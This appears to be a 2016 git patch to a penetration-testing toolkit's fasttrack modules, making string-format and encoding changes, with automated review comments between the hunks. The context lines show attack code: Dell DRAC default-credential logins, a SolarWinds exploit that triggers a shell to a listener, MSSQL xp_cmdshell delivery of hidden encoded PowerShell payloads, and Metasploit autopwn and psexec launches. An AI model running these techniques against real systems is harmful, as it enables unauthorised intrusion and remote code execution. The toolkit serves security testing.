From 4c3814943db8e5a13833f42cd8b9a17e9be7ed29 Mon Sep 17 00:00:00 2001
From: Ryan Jarvis
Date: Fri, 29 Jul 2016 15:15:09 -0700
Subject: [PATCH] {0} addition and encoding

---
 src/fasttrack/autopwn.py | 2 +-
 src/fasttrack/delldrac.py | 9 +++++----
 src/fasttrack/exploits/__init__.py | 1 +
 src/fasttrack/exploits/solarwinds.py | 2 +-
 src/fasttrack/mssql.py | 16 ++++++++--------
 src/fasttrack/psexec.py | 7 ++++---
 src/fasttrack/ridenum.py | 4 ++--
 src/fasttrack/sccm/__init__.py | 1 +
 8 files changed, 23 insertions(+), 19 deletions(-)

diff --git a/src/fasttrack/autopwn.py b/src/fasttrack/autopwn.py
index 1a43a6ba0..905482ba2 100644
--- a/src/fasttrack/autopwn.py
+++ b/src/fasttrack/autopwn.py
@@ -28,7 +28,7 @@ def prep(database, ranges):
 core.print_status("Using the {0} sql driver for autopwn".format(database))
 filewrite.write("db_driver {0}\r\n".format(database))
 core.print_status("Autopwn will attack the following systems: {0}".format(ranges))
- filewrite.write("db_nmap {}\r\n".format(ranges))
+ filewrite.write("db_nmap {0}\r\n".format(ranges))
 filewrite.write("db_autopwn -p -t -e -r\r\n")
 filewrite.write("jobs -K\r\n")
 filewrite.write("sessions -l\r\n")
diff --git a/src/fasttrack/delldrac.py b/src/fasttrack/delldrac.py
index 42340ca9f..b8e34908a 100644
--- a/src/fasttrack/delldrac.py
+++ b/src/fasttrack/delldrac.py
@@ -1,4 +1,5 @@
 #!/usr/bin/env python
+# coding=utf-8
 ###########################################
 #
@@ -91,7 +92,7 @@ def login_drac(ipaddr_single):
 "Accept-Encoding": "gzip, deflate",
 "Connection": "keep-alive",
 "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
- "Referer": "https://{}/Applications/dellUI/login.htm".format(ipaddr_single),
+ "Referer": "https://{0}/Applications/dellUI/login.htm".format(ipaddr_single),
 "Content-Length": 63,
 "Cookie": "test=1; SessionLang=EN",
 "Pragma": "no-cache",
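Review bot: prep(database, ranges) carries no docstring, and because its body starts before this hunk (`filewrite` is opened outside it) a reader of the changed `db_nmap` line cannot tell what the function produces; I would add `"""Write the Metasploit resource script for an autopwn run: db_driver, db_nmap over *ranges*, db_autopwn, then jobs -K and sessions -l."""` directly under the def. The `\r\n` terminators on every `filewrite.write` call also deserve a one-line comment stating why CRLF is used in a resource script, if that is deliberate rather than inherited.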
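Review bot: `"Content-Length": 63` is hard-coded in the header dict right after the changed Referer line, so any future change to the POST body silently sends a wrong length; `"Content-Length": 78` in login_chassis in the next hunk has the same problem. Unless the HTTP client in use ignores a caller-supplied length (the request call is outside this hunk, so I cannot tell), drop the entry and let the library compute it from the encoded body. login_drac starts and ends outside this hunk.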
@@ -145,7 +146,7 @@ def login_chassis(ipaddr_single):
 "Accept-Encoding": "gzip, deflate",
 "Connection": "keep-alive",
 "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
- "Referer": "https://{}/cgi-bin/webcgi/login".format(ipaddr_single),
+ "Referer": "https://{0}/cgi-bin/webcgi/login".format(ipaddr_single),
 "Content-Length": 78}
 # request the page
@@ -159,7 +160,7 @@ def login_chassis(ipaddr_single):
 pass # login failed
 # to many people logged in at a given time
 if 'Connection refused, maximum sessions already in use.' in data:
- print(("{}[!]{} There are to many people logged but un: root and pw: calvin are legit on IP: {}".format(bcolors.YELLOW,
+ print(("{0}[!]{1} There are to many people logged but un: root and pw: calvin are legit on IP: {2}".format(bcolors.YELLOW,
 bcolors.ENDC, ipaddr_single)))
 global global_check3
@@ -167,7 +168,7 @@ def login_chassis(ipaddr_single):
 # successful guess of passwords
 if "/cgi-bin/webcgi/index" in data:
- print("{}[*]{} Dell Chassis Compromised! username: root password: calvin for IP address: ".format(bcolors.GREEN,
+ print("{0}[*]{1} Dell Chassis Compromised! username: root password: calvin for IP address: {2}".format(bcolors.GREEN,
 bcolors.ENDC, ipaddr_single))
 global global_check4
diff --git a/src/fasttrack/exploits/__init__.py b/src/fasttrack/exploits/__init__.py
index e69de29bb..9bad5790a 100644
--- a/src/fasttrack/exploits/__init__.py
+++ b/src/fasttrack/exploits/__init__.py
@@ -0,0 +1 @@
+# coding=utf-8
diff --git a/src/fasttrack/exploits/solarwinds.py b/src/fasttrack/exploits/solarwinds.py
index 2b59aa50f..b41a2f14f 100644
--- a/src/fasttrack/exploits/solarwinds.py
+++ b/src/fasttrack/exploits/solarwinds.py
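Review bot: The user-facing message on the changed line in the -159 hunk still reads `There are to many people logged`; since the placeholders are being rewritten anyway it should become `There are too many people logged in`. The `print((...))` double parentheses on that line are a 2to3 artefact wrapping the argument for no reason; the single-paren form used by the changed line in the -167 hunk below is the one to keep. login_chassis continues outside both hunks.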
@@ -128,7 +128,7 @@ print("[*] Triggering shell")
 post_params = urlencode({'loginState': loginstate, 'loginName': postpayload, 'password': password})
 opener.open("http://{0}:9000/LoginServlet".format(rhost), post_params.encode())
 opener.open("http://{0}:9000/{1}".format(rhost, filename))
-print("[*] Check your shell on {} {}\n".format(lhost, lport))
+print("[*] Check your shell on {0} {1}\n".format(lhost, lport))
 # 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111
 # 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100
diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py
index a0fd1b3cf..56b696f11 100644
--- a/src/fasttrack/mssql.py
+++ b/src/fasttrack/mssql.py
@@ -216,7 +216,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
 import pexpect
 core.print_status("Starting the Metasploit listener...")
 msf_path = core.meta_path()
- child2 = pexpect.spawn("{}-r {}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"),
+ child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"),
 os.path.join(core.setdir, "meta_config")))
 # random executable name
@@ -237,7 +237,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
 if not port:
 port = "443"
- core.update_options("PORT={}".format(port))
+ core.update_options("PORT={0}".format(port))
 core.update_options("POWERSHELL_SOLO=ON")
 core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
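Review bot: The `http://{0}:9000` prefix is spelled out in both `opener.open` calls on the context lines above the changed print, so the port and scheme have to be edited in two places; a single module-level constant built once, e.g. `base_url = "http://{0}:9000".format(rhost)`, would keep them in step. This is module-level script code, so there is no enclosing function to document, but a comment naming what the two requests are expected to do would help the next reader.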
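Review bot: The new format string `"{0}-r {1}\r\n\r\n"` in the -216 hunk has no space between the msfconsole path and `-r`, so the first token handed to pexpect.spawn is an executable named `.../msfconsole-r`; the -286 hunk later in this file spawns with `"{0} -r {1}"`, which is the form this line needs. The trailing `\r\n\r\n` inside a spawn command string also looks like a leftover from a sendline and should probably go. `msf_path = core.meta_path()` is assigned on the line above but the spawn calls `core.meta_path()` again, so the fixed line would read `child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"), os.path.join(core.setdir, "meta_config")))`. deploy_hex2binary starts and ends outside this hunk.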
@@ -257,9 +257,9 @@ def deploy_hex2binary(ipaddr, port, username, password):
 with open(os.path.join(core.setdir, "x86.powershell")) as x86:
 x86 = x86.read()
- x86 = "powershell -nop -window hidden -noni -EncodedCommand {}".format(x86)
+ x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
 core.print_status("If you want the powershell commands and attack, "
- "they are exported to {}".format(os.path.join(core.setdir, "reports/powershell")))
+ "they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell")))
 with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:
 filewrite.write(x86)
@@ -286,7 +286,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
 import pexpect
 core.print_status("Starting the Metasploit listener...")
- child2 = pexpect.spawn("{} -r {}".format(os.path.join(msf_path, "msfconsole"),
+ child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
 os.path.join(core.setdir, "reports/powershell/powershell.rc")))
 core.print_status("Waiting for the listener to start first before we continue forward...")
 core.print_status("Be patient, Metaploit takes a little bit to start...")
@@ -308,7 +308,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
 # read in the file 900 bytes at a time
 with open(os.path.join(core.setdir, 'payload.hex')) as fileopen:
 core.print_status("Dropping initial begin certificate header...")
- conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {}.crt'".format(random_exe))
+ conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
 for data in fileopen.read(900).rstrip():
 if not data:
 continue
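Review bot: `os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt")` on the context line after the changed status message discards `core.setdir` entirely, because os.path.join restarts at an absolute component, so the file lands under the filesystem root rather than under the directory the status message names (`os.path.join(core.setdir, "reports/powershell")`, no leading slash). Drop the slash: `os.path.join(core.setdir, "reports/powershell/x86_powershell_injection.txt")`. The same path appears in psexec.py's -84 hunk. Rebinding the file handle to its own contents in `with open(...) as x86: x86 = x86.read()` works but reads oddly; a distinct name for the handle would be clearer. deploy_hex2binary continues outside this hunk.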
@@ -356,7 +356,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
 # we append more commands if option 1 is used
 if option == "1":
 core.print_status("Triggering the powershell injection payload... ")
- sql_command = ("exec master..xp_cmdshell '{}'".format(powershell_command))
+ sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command))
 thread.start_new_thread(conn.execute_query, (sql_command,))
 # using the old method
@@ -415,7 +415,7 @@ def cmdshell(ipaddr, port, username, password, option):
 # if the command isnt empty
 elif cmd:
 # execute the command
- mssql.sql_query("exec master..xp_cmdshell '{}'".format(cmd))
+ mssql.sql_query("exec master..xp_cmdshell '{0}'".format(cmd))
 # print the rest of the data
 mssql.printReplies()
 mssql.colMeta[0]['TypeData'] = 80 * 2
diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py
index 7e69cb4ae..08a6e7074 100644
--- a/src/fasttrack/psexec.py
+++ b/src/fasttrack/psexec.py
@@ -1,3 +1,4 @@
+# coding=utf-8
 #############################################
 #
 # Main SET module for psexec
@@ -84,7 +85,7 @@ try:
 with open(os.path.join(core.setdir, "x86.powershell")) as fileopen:
 x86 = fileopen.read()
- x86 = "powershell -nop -window hidden -noni -EncodedCommand {}".format(x86)
+ x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
 core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell")))
 with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
 filewrite.write(x86)
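Review bot: In the -84 hunk, the `"w"` on the context line two lines below the changed `x86 = ...` assignment is passed to os.path.join instead of to open, so the path becomes `.../x86_powershell_injection.txt/w` and the file is opened in the default read mode; the open fails, or if the path could be opened the read-only handle makes `filewrite.write(x86)` fail. The line should read `with open(os.path.join(core.setdir, "reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:`, which also removes the leading slash that makes os.path.join discard `core.setdir` (the same path problem as in mssql.py's -257 hunk). The enclosing try block starts and ends outside this hunk.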
@@ -112,8 +113,8 @@ try:
 # launch metasploit below
 core.print_status("Launching Metasploit.. This may take a few seconds.")
- subprocess.Popen("{} -r {}".format(os.path.join(core.meta_path(), "msfconsole"),
- os.path.join(core.setdir, "reports/powershell/powershell.rc")),
+ subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path(), "msfconsole"),
+ os.path.join(core.setdir, "reports/powershell/powershell.rc")),
 shell=True).wait()
 # handle exceptions
diff --git a/src/fasttrack/ridenum.py b/src/fasttrack/ridenum.py
index 37a693ba6..24ade8f19 100755
--- a/src/fasttrack/ridenum.py
+++ b/src/fasttrack/ridenum.py
@@ -187,7 +187,7 @@ try:
 sid = check_user(ip, account)
 # if its false then cycle threw
 if not sid:
- print("[!] Failed using account name: {}...Attempting another.".format(account))
+ print("[!] Failed using account name: {0}...Attempting another.".format(account))
 else:
 # success! Break out of the loop
 print("[*] Successfully enumerated SID account.. Moving on to extract via RID.\n")
@@ -220,7 +220,7 @@ try:
 if sid_names:
 for name in sid_names:
 # print the sid
- print("Account name: {}".format(name))
+ print("Account name: {0}".format(name))
 # write the file out
 filewrite.write(name + "\n")
diff --git a/src/fasttrack/sccm/__init__.py b/src/fasttrack/sccm/__init__.py
index e69de29bb..9bad5790a 100644
--- a/src/fasttrack/sccm/__init__.py
+++ b/src/fasttrack/sccm/__init__.py
@@ -0,0 +1 @@
+# coding=utf-8
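Review bot: The command rebuilt on the two changed lines of the -112 hunk is still one string executed with `shell=True`, so a `core.setdir` or Metasploit path containing a space or a shell metacharacter either breaks the invocation or is interpreted by the shell. Passing an argument list removes both problems: `subprocess.Popen([os.path.join(core.meta_path(), "msfconsole"), "-r", os.path.join(core.setdir, "reports/powershell/powershell.rc")]).wait()`. Unless the msfconsole wrapper itself needs a shell (cannot tell from here), `shell=True` can then be dropped. The enclosing try block starts and ends outside this hunk.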
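Review bot: The comment above the changed print in the -187 hunk, `# if its false then cycle threw`, has two typos and should read `# if it's false then cycle through`; it is the only explanation of the loop's control flow visible here, so it is worth getting right. The enclosing try block and the loop it sits in start outside this hunk.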